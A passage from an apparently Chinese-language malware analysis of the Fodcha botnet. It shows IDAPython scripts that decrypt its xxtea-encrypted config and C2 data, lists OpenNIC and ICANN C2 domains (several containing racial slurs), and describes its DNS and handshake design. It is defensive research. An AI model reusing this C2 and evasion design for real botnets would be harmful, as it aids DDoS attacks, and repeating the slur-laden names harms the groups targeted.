<p>&#x5F53;&#x6EE1;&#x8DB3;&#x8981;&#x6C42;&#x8FD0;&#x884C;&#x8981;&#x6C42;&#x65F6;&#xFF0C;&#x5219;&#x9996;&#x5148;&#x89E3;&#x5BC6;&#x51FA;&#x914D;&#x7F6E;&#x4FE1;&#x606F;&#xFF0C;&#x5728;Console&#x4E0A;&#x8F93;&#x51FA;<strong>snow slide</strong>&#xFF0C;&#x7136;&#x540E;&#x5C31;&#x662F;&#x4E00;&#x4E9B;&#x5E38;&#x89C1;&#x7684;&#x4E3B;&#x673A;&#x884C;&#x4E3A;&#xFF0C;&#x5982;&#x5355;&#x4E00;&#x5B9E;&#x4F8B;&#xFF0C;&#x8FDB;&#x7A0B;&#x540D;&#x4F2A;&#x88C5;&#xFF0C;&#x64CD;&#x63A7;watchdog&#xFF0C;&#x6E05;&#x7A7A;&#x7279;&#x5B9A;&#x7AEF;&#x53E3;&#x8FDB;&#x7A0B;&#xFF0C;&#x4E0A;&#x62A5;&#x7279;&#x5B9A;&#x8FDB;&#x7A0B;&#x4FE1;&#x606F;&#x7B49;&#xFF0C;&#x6211;&#x4EEC;&#x8BA4;&#x4E3A;&#x8FD9;&#x4E9B;&#x4E3B;&#x673A;&#x4FA7;&#x7684;&#x529F;&#x80FD;&#x6CA1;&#x6709;&#x592A;&#x591A;&#x4EAE;&#x70B9;&#xFF0C;&#x56E0;&#x6B64;&#x4E0D;&#x518D;&#x5C55;&#x5F00;&#x5206;&#x6790;&#xFF0C;&#x4E0B;&#x6587;&#x5C06;&#x7740;&#x91CD;&#x4ECE;&#x89E3;&#x5BC6;&#x914D;&#x7F6E;&#x4FE1;&#x606F;&#xFF0C;&#x7F51;&#x7EDC;&#x901A;&#x4FE1;&#xFF0C;DDoS&#x653B;&#x51FB;&#x7B49;&#x65B9;&#x9762;&#x5BF9;Fodcha&#x8FDB;&#x884C;&#x5256;&#x6790;&#x3002;</p>
<h2 id="%E8%A7%A3%E5%AF%86%E9%85%8D%E7%BD%AE%E4%BF%A1%E6%81%AFconfig">&#x89E3;&#x5BC6;&#x914D;&#x7F6E;&#x4FE1;&#x606F;(Config)</h2>
<p>Fodcha&#x5728;V2.X&#xFF0C;V3&#x4F7F;&#x7528;&#x5E76;&#x5217;&#x7684;Config&#x7EC4;&#x7EC7;&#x65B9;&#x5F0F;&#xFF0C;&#x800C;&#x5728;V4,V4.X&#x4E2D;&#x5219;&#x4F7F;&#x7528;&#x7ED3;&#x6784;&#x5316;&#x7684;Config&#x7EC4;&#x7EC7;&#x65B9;&#x5F0F;&#xFF0C;&#x4E0B;&#x56FE;&#x975E;&#x5E38;&#x6E05;&#x695A;&#x7684;&#x663E;&#x793A;&#x4E86;&#x5B83;&#x4EEC;&#x7684;&#x533A;&#x522B;&#x3002;</p>
<p><a href="https://blog.netlab.360.com/content/images/2022/10/fodcha_disconfig.png"><img src="https://blog.netlab.360.com/content/images/2022/10/fodcha_disconfig.png" class="kg-image"></a></p>
<p>&#x867D;&#x7136;Config&#x7684;&#x7EC4;&#x7EC7;&#x65B9;&#x6CD5;&#x4E0D;&#x4E00;&#x6837;&#xFF0C;&#x4F46;&#x5B83;&#x4EEC;&#x7684;&#x52A0;&#x5BC6;&#x65B9;&#x6CD5;&#x662F;&#x4E00;&#x6837;&#x7684;&#xFF0C;&#x901A;&#x8FC7;&#x4E0B;&#x9762;&#x4EE3;&#x7801;&#x7247;&#x6BB5;&#x5F15;&#x7528;&#x7684;&#x5E38;&#x91CF;&#x53EF;&#x77E5;&#xFF0C;&#x5B83;&#x4EEC;&#x4F7F;&#x7528;&#x7684;&#x662F;xxtea&#x7B97;&#x6CD5;&#xFF0C;&#x5BC6;&#x94A5;&#x4E3A;<code>PJbiNbbeasddDfsc</code>&#x3002;</p>
<p><a href="https://blog.netlab.360.com/content/images/2022/10/fodcha_xxtea.png"><img src="https://blog.netlab.360.com/content/images/2022/10/fodcha_xxtea.png" class="kg-image"></a></p>
<p>&#x7ECF;&#x8FC7;&#x9006;&#x5411;&#xFF0C;&#x6211;&#x4EEC;&#x7F16;&#x5199;&#x4E86;&#x4EE5;&#x4E0B;IDAPYTHON&#x811A;&#x672C;&#x6765;&#x89E3;&#x5BC6;&#x914D;&#x7F6E;&#x4FE1;&#x606F;&#x3002;</p>
<pre><code># md5: ea7945724837f019507fd613ba3e1da9
# requirement: pip install xxtea-py
# test: ida7.6_python3

import ida_bytes
import xxtea

BufBase=0x1F2B0
ConfBase=0x0001F1A0
key=b&quot;PJbiNbbeasddDfsc&quot;
for i in range(17):
    offset=ida_bytes.get_word(i*16+ConfBase+2)
    leng=ida_bytes.get_word(i*16+ConfBase+4)-offset
    buf=ida_bytes.get_bytes(BufBase+offset,leng)
    print(&quot;index:%d, %s&quot; %(i,xxtea.decrypt(buf,key)))
</code></pre>
<p>&#x89E3;&#x5BC6;&#x540E;&#x7684;Config&#x4FE1;&#x606F;&#x5982;&#x4E0B;&#x8868;&#x6240;&#x793A;&#xFF0C;&#x53EF;&#x4EE5;&#x770B;&#x5230;index 11&#x8FD8;&#x4FDD;&#x7559;&#x7740;&#x201C;&#x6295;&#x964D;&#x201D;&#x7684;&#x5F69;&#x86CB;&#xFF0C;&#x53E6;&#x5916;&#x503C;&#x5F97;&#x4E00;&#x63D0;&#x7684;&#x662F;index 12&#xFF0C;&#x5B83;&#x662F;reporter&#x670D;&#x52A1;&#x5668;&#x5730;&#x5740;&#xFF0C;Fodcha&#x4F1A;&#x5C06;&#x4E00;&#x4E9B;&#x7279;&#x5B9A;&#x8FDB;&#x7A0B;&#x7684;&#x4FE1;&#x606F;&#x4E0A;&#x62A5;&#x7ED9;&#x5B83;&#x3002;</p>
<table>
<thead>
<tr>
<th>Index</th>
<th>Value</th>
</tr>
</thead>
<tbody>
<tr>
<td>0</td>
<td>snow slide</td>
</tr>
<tr>
<td>1</td>
<td>/proc/</td>
</tr>
<tr>
<td>2</td>
<td>/stat</td>
</tr>
<tr>
<td>3</td>
<td>/proc/self/exe</td>
</tr>
<tr>
<td>4</td>
<td>/cmdline</td>
</tr>
<tr>
<td>5</td>
<td>/maps</td>
</tr>
<tr>
<td>6</td>
<td>/exe</td>
</tr>
<tr>
<td>7</td>
<td>/lib</td>
</tr>
<tr>
<td>8</td>
<td>/usr/lib</td>
</tr>
<tr>
<td>9</td>
<td>.ri</td>
</tr>
<tr>
<td>10</td>
<td>GET /geoip/?res=10&amp;r HTTP/1.1\r\nHost: 1.1.1.1\r\nConnection: Close\r\n\r\n</td>
</tr>
<tr>
<td>11</td>
<td>Netlab pls leave me alone I surrender</td>
</tr>
<tr>
<td>12</td>
<td>kvsolutions.ru</td>
</tr>
<tr>
<td>13</td>
<td>api.opennicproject.org</td>
</tr>
<tr>
<td>14</td>
<td>watchdog</td>
</tr>
<tr>
<td>15</td>
<td>/dev/</td>
</tr>
<tr>
<td>16</td>
<td>TSource Engine Query</td>
</tr>
</tbody>
</table>
<h2 id="%E7%BD%91%E7%BB%9C%E9%80%9A%E4%BF%A1">&#x7F51;&#x7EDC;&#x901A;&#x4FE1;</h2>
<p>Fodcha&#x7684;&#x7F51;&#x7EDC;&#x901A;&#x4FE1;&#x5728;&#x4EE3;&#x7801;&#x5C42;&#x9762;&#x6709;&#x4E00;&#x4E2A;&#x975E;&#x5E38;&#x56FA;&#x5B9A;&#x7684;&#x7279;&#x70B9;&#xFF1A;&#x4E00;&#x4E2A;&#x6C38;&#x771F;&#x7684;While&#x5FAA;&#x73AF;&#xFF0C;&#x901A;&#x8FC7;switch-case&#x8FDB;&#x884C;&#x5404;&#x4E2A;&#x9636;&#x6BB5;&#x7684;&#x5904;&#x7406;&#xFF0C;&#x56E0;&#x6B64;Fodcha&#x5404;&#x4E2A;&#x7248;&#x672C;&#x7684;&#x7F51;&#x7EDC;&#x534F;&#x8BAE;&#x5904;&#x7406;&#x51FD;&#x6570;&#x5728;IDA&#x4E2D;&#x4EA7;&#x751F;&#x7684;CFG&#x56FE;&#x9AD8;&#x5EA6;&#x76F8;&#x4F3C;&#xFF0C;&#x8FD9;&#x4E2A;&#x7279;&#x70B9;&#x53EF;&#x4EE5;&#x5E2E;&#x52A9;&#x6211;&#x4EEC;&#x5BF9;&#x6837;&#x672C;&#x8FDB;&#x884C;&#x8FA8;&#x522B;&#xFF0C;&#x5BF9;&#x529F;&#x80FD;&#x5FEB;&#x901F;&#x5B9A;&#x4F4D;&#x3002;</p>
<img src="https://blog.netlab.360.com/content/images/2022/10/fodcha_cfg.png" width="860px"> 
<p>&#x603B;&#x7684;&#x6765;&#x8BF4;&#xFF0C;Fodcha&#x7684;&#x7F51;&#x7EDC;&#x901A;&#x4FE1;&#x8981;&#x7ECF;&#x8FC7;&#x4EE5;&#x4E0B;4&#x4E2A;&#x6B65;&#x9AA4;&#xFF1A;</p>
<ol>
<li>&#x89E3;&#x5BC6;C2</li>
<li>DNS&#x67E5;&#x8BE2;</li>
<li>&#x5EFA;&#x7ACB;&#x901A;&#x4FE1;</li>
<li>&#x6267;&#x884C;&#x6307;&#x4EE4;</li>
</ol>
<h3 id="0x1-%E8%A7%A3%E5%AF%86c2">0x1: &#x89E3;&#x5BC6;C2</h3>
<p>Fodcha&#x7684;&#x4E0D;&#x540C;&#x7248;&#x672C;&#x652F;&#x6301;&#x7684;C2&#x79CD;&#x7C7B;&#x662F;&#x4E0D;&#x4E00;&#x6837;&#x7684;&#xFF0C;V2.X&#x53EA;&#x6709;1&#x7EC4;OpenNIC C2&#xFF1B;V3&amp;V4&#x62E5;&#x6709;1&#x7EC4;OpenNIC C2&#xFF0C;1&#x7EC4;ICANN C2&#xFF1B;&#x800C;V4.X&#x5219;&#x662F;&#x6700;&#x591A;&#x7684;&#xFF0C;1&#x7EC4;OpenNIC C2&#xFF0C;2&#x7EC4;ICANN C2&#xFF0C;&#x4E0B;&#x9762;&#x7684;&#x56FE;&#x975E;&#x5E38;&#x6E05;&#x695A;&#x7684;&#x663E;&#x793A;&#x4E86;&#x5B83;&#x4EEC;&#x7684;&#x533A;&#x522B;&#x3002;</p>
<p><a href="https://blog.netlab.360.com/content/images/2022/10/fodcha_c2_dis.png"><img src="https://blog.netlab.360.com/content/images/2022/10/fodcha_c2_dis.png" class="kg-image"></a></p>
<p>&#x867D;&#x7136;C2&#x79CD;&#x7C7B;&amp;&#x6570;&#x91CF;&#x4E0D;&#x4E00;&#x6837;&#xFF0C;&#x4F46;&#x662F;&#x5B83;&#x4EEC;&#x7684;&#x5904;&#x7406;&#x903B;&#x8F91;&#x5982;&#x4E0B;&#x56FE;&#x6240;&#x793A;&#xFF0C;&#x51E0;&#x4E4E;&#x662F;&#x4E00;&#x6837;&#x7684;&#xFF0C;&#x9996;&#x5148;&#x901A;&#x8FC7;C2_GET&#x51FD;&#x6570;&#x83B7;&#x5F97;&#x4E00;&#x4E2A;C2&#x57DF;&#x540D;&#xFF0C;&#x7136;&#x540E;&#x901A;&#x8FC7;DNS_QUERY&#x51FD;&#x6570;&#x83B7;&#x5F97;C2&#x5BF9;&#x5E94;&#x7684;IP&#xFF0C;&#x5176;&#x4E2D;C2_GET&#x7684;&#x7B2C;&#x4E00;&#x4E2A;&#x53C2;&#x6570;&#x4E3A;C2&#x5BC6;&#x6587;&#x6570;&#x636E;&#xFF0C;&#x7B2C;2&#x4E2A;&#x53C2;&#x6570;&#x4E3A;&#x957F;&#x5EA6;&#xFF0C;&#x800C;DNS_QUERY&#x7684;&#x7B2C;2&#x4E2A;&#x53C2;&#x6570;&#x5219;&#x6697;&#x793A;&#x4E86;C2&#x7684;&#x7C7B;&#x578B;&#x3002;</p>
<img src="https://blog.netlab.360.com/content/images/2022/10/FODCHA_c2compose.png" width="860px"> 
<p>&#x901A;&#x8FC7;C2_GET&#x53EF;&#x4EE5;&#x83B7;&#x5F97;&#x4E00;&#x4E2A;&#x6709;&#x6548;&#x7684;C2&#x57DF;&#x540D;&#xFF0C;&#x5B83;&#x5185;&#x90E8;&#x7684;&#x5B9E;&#x73B0;&#x53EF;&#x4EE5;&#x5206;&#x6210;2&#x6B65;&#xFF1A;</p>
<ul>
<li>&#x9996;&#x5148;&#x5F97;&#x89E3;&#x5BC6;C2&#x5BC6;&#x6587;&#x6570;&#x636E;&#x3002;</li>
<li>&#x7136;&#x540E;&#x5C06;&#x5B83;&#x4EEC;&#x6784;&#x9020;&#x6210;&#x4E00;&#x4E2A;&#x5408;&#x6CD5;&#x7684;&#x57DF;&#x540D;&#x3002;</li>
</ul>
<h3 id="%E8%A7%A3%E5%AF%86c2%E5%AF%86%E6%96%87%E6%95%B0%E6%8D%AE">&#x89E3;&#x5BC6;C2&#x5BC6;&#x6587;&#x6570;&#x636E;</h3>
<p>C2&#x7684;&#x5BC6;&#x6587;&#x6570;&#x636E;&#x4F7F;&#x7528;&#x4E86;&#x914D;&#x7F6E;&#x4FE1;&#x606F;&#x4E00;&#x6837;&#x7684;&#x52A0;&#x5BC6;&#x65B9;&#x5F0F;&#xFF0C;&#x5373;xxtea&#xFF0C;&#x5BC6;&#x94A5;&#x4E5F;&#x662F;<strong>PJbiNbbeasddDfsc</strong>&#xFF0C;&#x901A;&#x8FC7;&#x4E0B;&#x9762;&#x7B80;&#x5355;&#x7684;IDAPYTHON&#x811A;&#x672C;&#xFF0C;&#x5373;&#x53EF;&#x89E3;&#x5BC6;&#x51FA;OpenNic C2&#x6570;&#x636E;&#x3002;</p>
<pre><code>#md5: 899047DDF6F62F07150837AEF0C1EBFB
import xxtea
import ida_bytes
import hexdump
key=b&quot;PJbiNbbeasddDfsc&quot;
buf=ida_bytes.get_bytes(0x0001CA6C,1568)  # Ciphertext of OpenNic C2
plaintext=xxtea.decrypt(buf,key)
print(plaintext)
</code></pre>
<p>&#x89E3;&#x5BC6;&#x540E;&#x7684;C2&#x6570;&#x636E;&#x5982;&#x4E0B;&#x56FE;&#x6240;&#x793A;&#xFF0C;&#x53EF;&#x4EE5;&#x770B;&#x51FA;C2&#x6570;&#x636E;&#x7531;2&#x90E8;&#x5206;&#x7EC4;&#x6210;&#xFF0C;&#x524D;&#x9762;&#x7684;&#x662F;domain names&#xFF0C;&#x540E;&#x9762;&#x662F;TLDs&#xFF0C;&#x5B83;&#x4EEC;&#x901A;&#x8FC7;&#x7EA2;&#x6846;&#x4E2D;&#x7684;&#x201C;<strong>/</strong>&#x201D;&#x7B26;&#x53F7;&#x5206;&#x9694;&#x3002;</p>
<img src="https://blog.netlab.360.com/content/images/2022/10/fodcha_c2plaintext.png" width="860px"> 
<h3 id="%E6%9E%84%E9%80%A0%E5%9F%9F%E5%90%8D">&#x6784;&#x9020;&#x57DF;&#x540D;</h3>
<p>Fodcha&#x6709;&#x4E00;&#x4E2A;&#x7279;&#x5B9A;&#x7684;&#x57DF;&#x540D;&#x6784;&#x9020;&#x65B9;&#x6CD5;&#xFF0C;&#x7B49;&#x6548;&#x7684;Python&#x5B9E;&#x73B0;&#x5982;&#x4E0B;&#x6240;&#x793A;&#xFF1A;</p>
<pre><code># md5: 899047ddf6f62f07150837aef0c1ebfb
# requirement: pip install xxtea-py
# test: ida7.6_python3

import xxtea
import ida_bytes

def getcnt(length):
    cnt=1
    while True:
        cnt +=1
        calc=2
        
        for i in range(1,cnt):
            calc+=2+12*i%cnt
                    
        if calc +cnt==length-1:
            return cnt

                        
key=b&quot;PJbiNbbeasddDfsc&quot;
buf=ida_bytes.get_bytes(0x0001CA6C,1568)  # Ciphertext of OpenNic C2
plaintext=xxtea.decrypt(buf,key)

domains,tlds=plaintext.split(b&apos;/&apos;)
domainList=domains.split(b&apos;,&apos;)
tldList=tlds.split(b&apos;,&apos;)

cnt=getcnt(len(domainList))

print(&quot;------------There&apos;re %d C2------------&quot; %cnt)
coff=2
for i in range(0,cnt):
    if i ==0:
        c2Prefix=domainList[i+coff]
    else:
        coff+=12*i %cnt+2
        c2Prefix=domainList[i+coff]
    c2Tld=tldList[(cnt-i-1)*3]
    print(c2Prefix + b&apos;.&apos; + c2Tld)

</code></pre>
<p>&#x5C06;&#x4E0A;&#x6587;&#x5F97;&#x5230;&#x7684;C2&#x6570;&#x636E;&#x505A;&#x4E3A;&#x8F93;&#x5165;&#xFF0C;&#x6700;&#x7EC8;&#x6784;&#x9020;&#x51FA;&#x4EE5;&#x4E0B;14&#x4E2A;OpenNIC C2&#x3002;</p>
<pre><code>techsupporthelpars.oss
yellowchinks.geek
yellowchinks.dyn
wearelegal.geek
funnyyellowpeople.libre
chinksdogeaters.dyn
blackpeeps.dyn
pepperfan.geek
chinkchink.libre
peepeepoo.libre
respectkkk.geek
bladderfull.indy
tsengtsing.libre
obamalover.pirate
</code></pre>
<p>&#x5BF9;ICANN&#x57DF;&#x540D;&#x4F53;&#x7CFB;&#x719F;&#x6089;&#x7684;&#x8BFB;&#x8005;&#xFF0C;&#x6216;&#x8BB8;&#x4F1A;&#x5728;&#x7B2C;&#x4E00;&#x773C;&#x5C31;&#x8BA4;&#x4E3A;&#x6211;&#x4EEC;&#x7684;&#x89E3;&#x5BC6;&#x662F;&#x9519;&#x8BEF;&#x7684;&#xFF0C;&#x56E0;&#x4E3A;ICANN&#x7684;&#x57DF;&#x540D;&#x4F53;&#x7CFB;&#x5E76;&#x4E0D;&#x652F;&#x6301;&#x8FD9;&#x4E9B;TLDs&#xFF0C;&#x5B83;&#x4EEC;&#x80AF;&#x5B9A;&#x201C;&#x65E0;&#x6CD5;&#x89E3;&#x6790;&#x201D;&#xFF0C;&#x4E8B;&#x5B9E;&#x4E0A;&#x5B83;&#x4EEC;&#x6B63;&#x662F;OpenNIC&#x4F53;&#x7CFB;&#x4E0B;&#x7684;&#x57DF;&#x540D;&#xFF0C;OpenNIC&#x662F;&#x72EC;&#x7ACB;&#x4E8E;ICANN&#x7684;&#x53E6;&#x4E00;&#x5957;&#x57DF;&#x540D;&#x4F53;&#x7CFB;&#xFF0C;&#x5B83;&#x652F;&#x6301;&#x4E0B;&#x56FE;&#x6240;&#x793A;&#x7684;TLDs&#xFF0C;OpenNIC&#x7684;&#x57DF;&#x540D;&#x65E0;&#x6CD5;&#x901A;&#x8FC7;&#x5E38;&#x89C1;&#x7684;DNS(&#x5982;8.8.8.8&#xFF0C;101.198.198.198)&#x89E3;&#x6790;&#xFF0C;&#x5FC5;&#x987B;&#x4F7F;&#x7528;&#x6307;&#x5B9A;&#x7684;NameServer&#xFF0C;&#x66F4;&#x591A;&#x7684;&#x7EC6;&#x8282;&#x5C31;&#x4E0D;&#x518D;&#x5C55;&#x5F00;&#xFF0C;&#x611F;&#x5174;&#x8DA3;&#x7684;&#x8BFB;&#x8005;&#x81EA;&#x884C;&#x5230;&#x5176;<a href="https://www.opennic.org/?ref=blog.netlab.360.com"><strong>&#x5B98;&#x65B9;&#x7F51;&#x7AD9;</strong></a>&#x4E86;&#x89E3;&#x3002;</p>
<img src="https://blog.netlab.360.com/content/images/2022/10/fodcha_opennic.png" width="860px"> 
<p>&#x7528;&#x540C;&#x6837;&#x7684;&#x65B9;&#x6CD5;&#xFF0C;&#x6211;&#x4EEC;&#x53EF;&#x4EE5;&#x5F97;&#x5230;&#x4EE5;&#x4E0B;4&#x4E2A;ICANN C2&#x3002;</p>
<pre><code>cookiemonsterboob[.]com
forwardchinks[.]com
doodleching[.]com
milfsfors3x[.]com
</code></pre>
<h3 id="0x2-dns%E6%9F%A5%E8%AF%A2">0X2: DNS&#x67E5;&#x8BE2;</h3>
<p>&#x5F53;&#x6210;&#x529F;&#x83B7;&#x5F97;C2&#x57DF;&#x540D;&#x540E;&#xFF0C;Bot&#x901A;&#x8FC7;&#x51FD;&#x6570;<strong>DNS_QUERY</strong>&#x8FDB;&#x884C;&#x57DF;&#x540D;&#x89E3;&#x6790;&#xFF0C;&#x5B83;&#x7684;&#x7B2C;2&#x4E2A;&#x53C2;&#x6570;&#x662F;&#x4E00;&#x4E2A;FLAG&#xFF0C;&#x6697;&#x793A;&#x4E86;OpenNIC/ICANN C2&#x7684;&#x4E0D;&#x540C;&#x5904;&#x7406;&#x8FC7;&#x7A0B;&#xFF0C;&#x76F8;&#x5E94;&#x7684;&#x4EE3;&#x7801;&#x7247;&#x6BB5;&#x5982;&#x4E0B;&#x6240;&#x793A;&#xFF1A;</p>
<img src="https://blog.netlab.360.com/content/images/2022/10/fodcha_disdns.png" width="860px"> 
<p>&#x53EF;&#x4EE5;&#x770B;&#x51FA;&#x5BF9;&#x4E8E;OpenNIC C2&#x7684;&#x89E3;&#x6790;&#x6709;2&#x4E2A;&#x9009;&#x62E9;&#xFF1A;</p>
<ul>
<li>&#x9009;&#x62E9;1&#xFF1A;&#x901A;&#x8FC7;API&#x63A5;&#x53E3;&#x5411;<strong>api.opennicproject.org</strong>&#x8BF7;&#x6C42;&#xFF0C;&#x52A8;&#x6001;&#x7684;&#x83B7;&#x53D6;nameserver</li>
</ul>
<img src="https://blog.netlab.360.com/content/images/2022/10/fodcha_resolvns.png" width="860px"> 
<ul>
<li>&#x9009;&#x62E9;2&#xFF1A;&#x4F7F;&#x7528;&#x4E0B;&#x56FE;&#x6240;&#x793A;&#x7684;&#x786C;&#x7F16;&#x7801;nameserver</li>
</ul>
<img src="https://blog.netlab.360.com/content/images/2022/10/fodcha_opennicHard.png" width="860px"> 
<p>&#x800C;&#x5BF9;&#x4E8E;ICANN C2&#x5219;&#x53EA;&#x6709;&#x4E00;&#x4E2A;&#x9009;&#x62E9;&#xFF0C;&#x5373;&#x4F7F;&#x7528;&#x4E0B;&#x56FE;&#x4E2D;&#x7684;&#x786C;&#x7F16;&#x7801;nameserver&#x3002;</p>
<img src="https://blog.netlab.360.com/content/images/2022/10/fodcha_iccanHard.png" width="860px"> 
<p>&#x4EE5;&#x5B9E;&#x9645;&#x89E3;&#x6790; C2&#x201C;techsupporthelpars.oss&#x201D;&#x4E3A;&#x4F8B;&#xFF0C;&#x5B83;&#x7684;&#x89E3;&#x6790;&#x8FC7;&#x7A0B;&#x5728;&#x7F51;&#x7EDC;&#x6D41;&#x91CF;&#x4E2D;&#x7684;&#x4F53;&#x73B0;&#x5982;&#x4E0B;&#x6240;&#x793A;&#xFF1A;</p>
<p><a href="https://blog.netlab.360.com/content/images/2022/10/fodcha_opendnsexample.png"><img src="https://blog.netlab.360.com/content/images/2022/10/fodcha_opendnsexample.png" class="kg-image"></a></p>
<h3 id="%E4%B8%BA%E4%BB%80%E4%B9%88%E4%BD%BF%E7%94%A8opennic-icann-%E5%8F%8Cc2">&#x4E3A;&#x4EC0;&#x4E48;&#x4F7F;&#x7528;OpenNIC / ICANN &#x53CC;C2?</h3>
<p>Fodcha&#x4F5C;&#x8005;&#x6784;&#x5EFA;&#x4E86;&#x4E00;&#x5957;OpenNIC / ICANN &#x53CC;C2&#x7684;&#x5197;&#x4F59;&#x7ED3;&#x6784;&#xFF0C;&#x4ED6;&#x4E3A;&#x4EC0;&#x4E48;&#x8981;&#x8FD9;&#x4E48;&#x505A;&#x5462;&#xFF1F;</p>
<p>&#x4ECE;C2&#x57FA;&#x7840;&#x8BBE;&#x65BD;&#x7684;&#x89D2;&#x5EA6;&#x51FA;&#x53D1;&#xFF0C;Fodcha&#x88AB;&#x66DD;&#x5149;&#x540E;&#xFF0C;&#x5176;C2&#x88AB;&#x4E00;&#x4E9B;&#x670D;&#x52A1;&#x5546;&#x52A0;&#x5165;&#x5230;&#x4E86;&#x76D1;&#x63A7;&#x5217;&#x8868;&#xFF0C;&#x8FDB;&#x884C;&#x62E6;&#x622A;&#x3002;&#x4F8B;&#x5982;Quad9DNS&#xFF08;9.9.9.9&#xFF09;&#x5C31;&#x66FE;&#x53D1;&#x8FC7;&#x4E00;&#x4E2A;&#x5173;&#x4E8E;Fodcha&#x57DF;&#x540D;&#x6D41;&#x91CF;spike&#x7684;Twitter</p>
<img src="https://blog.netlab.360.com/content/images/2022/10/fodcha_quad.png" width="860px"> 
<p>&#x5728;Fodcha&#x88AB;&#x6253;&#x51FB;&#x4E4B;&#x540E;&#xFF0C;&#x5176;&#x4F5C;&#x8005;&#x5728;&#x91CD;&#x65B0;&#x9009;&#x62E9;C2&#x57FA;&#x7840;&#x8BBE;&#x65BD;&#x65F6;&#xFF0C;&#x770B;&#x4E2D;&#x4E86;OpenNIC&#x5BA3;&#x4F20;&#x7684;&quot;DNS Neutrality&quot;&#x7279;&#x6027;&#xFF0C;&#x901A;&#x8FC7;&#x7ED5;&#x5F00;ICANN&#x7684;&#x57DF;&#x540D;&#x4F53;&#x7CFB;&#xFF0C;&#x4ECE;&#x6839;&#x672C;&#x4E0A;&#x6D88;&#x9664;C2&#x88AB;&#x76D1;&#x7BA1;&amp;&#x63A5;&#x7BA1;&#x7684;&#x53EF;&#x80FD;&#x6027;&#xFF0C;&#x56E0;&#x6B64;Fodcha&#x5728;V2.X&#x5F15;&#x5165;OpenNic C2&#xFF0C;&#x5E76;&#x5C06;&#x5176;&#x505A;&#x4E3A;&#x4E3B;C2&#x3002;</p>
<p>&#x4E0E;&#x6B64;&#x540C;&#x65F6;&#xFF0C;OpenNIC C2&#x53EF;&#x80FD;&#x5B58;&#x5728;&#x4E00;&#x4E9B;&#x95EE;&#x9898;&#xFF0C;&#x6BD4;&#x5982;OpenNIC&#x7684;NameServer&#x5728;&#x67D0;&#x4E9B;&#x5730;&#x533A;&#x53EF;&#x80FD;&#x65E0;&#x6CD5;&#x8BBF;&#x95EE;&#xFF0C;&#x6216;&#x8005;&#x57DF;&#x540D;&#x89E3;&#x6790;&#x4E0A;&#x5B58;&#x5728;&#x6548;&#x7387;&#x6216;&#x7A33;&#x5B9A;&#x6027;&#x7684;&#x95EE;&#x9898;&#x3002;&#x51FA;&#x4E8E;&#x5065;&#x58EE;&#x6027;&#x7684;&#x8003;&#x8651;&#xFF0C;Fodcha&#x4F5C;&#x8005;&#x5728;V3&#x4E4B; &#x540E;&#x91CD;&#x65B0;&#x52A0;&#x5165;ICANN C2&#x4F5C;&#x4E3A;&#x540E;&#x5907;C2&#xFF0C;&#x4E0E;&#x4E3B;C2&#x6784;&#x6210;&#x5197;&#x4F59;&#x7ED3;&#x6784;&#x3002;</p>
<h3 id="0x3-%E5%BB%BA%E7%AB%8B%E9%80%9A%E4%BF%A1">0x3: &#x5EFA;&#x7ACB;&#x901A;&#x4FE1;</h3>
<p>Fodcha Bot&#x901A;&#x8FC7;&#x53C8;&#x4E0B;&#x4EE3;&#x7801;&#x7247;&#x6BB5;&#x548C;C2&#x5EFA;&#x7ACB;&#x8FDE;&#x63A5;&#xFF0C;&#x4E00;&#x5171;&#x6709;&#x4E2A;22&#x4E2A;&#x7AEF;&#x53E3;&#x3002;</p>
<img src="https://blog.netlab.360.com/content/images/2022/10/fodcha_establishConn.png" width="860px"> 
<p>&#x5F53;&#x6210;&#x529F;&#x548C;C2&#x5EFA;&#x7ACB;&#x8FDE;&#x63A5;&#x540E;&#xFF0C;Bot&#x4E0E;C2&#x5FC5;&#x987B;&#x7ECF;&#x8FC7;3&#x4E2A;&#x9636;&#x6BB5;&#x7684;&#x4EA4;&#x4E92;&#xFF0C;&#x624D;&#x80FD;&#x771F;&#x6B63;&#x5EFA;&#x7ACB;&#x901A;&#x4FE1;&#x3002;</p>
<ul>
<li>&#x9636;&#x6BB5;1&#xFF1A;Bot&#x5411;C2&#x8BF7;&#x6C42;chacha20&#x52A0;&#x5BC6;&#x7B97;&#x6CD5;&#x7684;&#x7684;key&amp;nonce&#x3002;</li>
<li>&#x9636;&#x6BB5;2&#xFF1A;Bot&#x4E0E;C2&#x4F7F;&#x7528;&#x9636;&#x6BB5;1&#x7684;key&amp;nonce&#x8FDB;&#x884C;&#x8EAB;&#x4EFD;&#x786E;&#x8BA4;&#x3002;</li>
<li>&#x9636;&#x6BB5;3&#xFF1A;Bot&#x5C06;&#x52A0;&#x5BC6;&#x540E;&#x7684;&#x4E0A;&#x7EBF;&amp;&#x5206;&#x7EC4;&#x4FE1;&#x606F;&#x53D1;&#x5F80;C2&#x3002;</li>
</ul>
<p>&#x4E3A;&#x4E86;&#x8F85;&#x52A9;&#x5206;&#x6790;&#xFF0C;&#x6211;&#x4EEC;&#x5728;&#x53D7;&#x9650;&#x7684;&#x73AF;&#x5883;&#x5185;&#x8FD0;&#x884C;&#x4E86;Bot&#x6837;&#x672C;&#xFF0C;&#x5E76;&#x4F7F;&#x7528;<code>fsdsaD</code>&#x505A;&#x4E3A;&#x5206;&#x7EC4;&#x5B57;&#x4E32;&#xFF0C;&#x4EA7;&#x751F;&#x4E86;&#x4E0B;&#x56FE;&#x6240;&#x793A;&#x7684;&#x7F51;&#x7EDC;&#x6D41;&#x91CF;&#xFF0C;&#x4E0B;&#x6587;&#x5C06;&#x8BE6;&#x7EC6;&#x4ECB;&#x7ECD;&#x6B64;&#x6D41;&#x91CF;&#x662F;&#x5982;&#x4F55;&#x751F;&#x6210;&#x7684;&#x3002;</p>
<img src="https://blog.netlab.360.com/content/images/2022/10/fodcha_prapacket.png" width="860px"> 
<h3 id="%E9%98%B6%E6%AE%B51%EF%BC%9Abotc2-%E6%A0%BC%E5%BC%8F%E4%B8%BAhead7-bytes-body-random-20-40-bytes">&#x9636;&#x6BB5;1&#xFF1A;Bot ---&gt; C2 ,&#x683C;&#x5F0F;&#x4E3A;head(7 bytes) + body( random 20-40 bytes)</h3>
